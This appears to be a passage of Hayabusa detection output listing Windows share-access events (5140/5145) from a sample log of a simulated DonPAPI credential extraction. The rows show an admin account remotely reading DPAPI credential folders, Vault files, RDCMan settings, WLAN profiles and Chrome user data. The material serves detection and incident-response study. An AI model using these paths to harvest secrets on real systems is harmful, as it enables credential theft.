Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 
10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:03.813 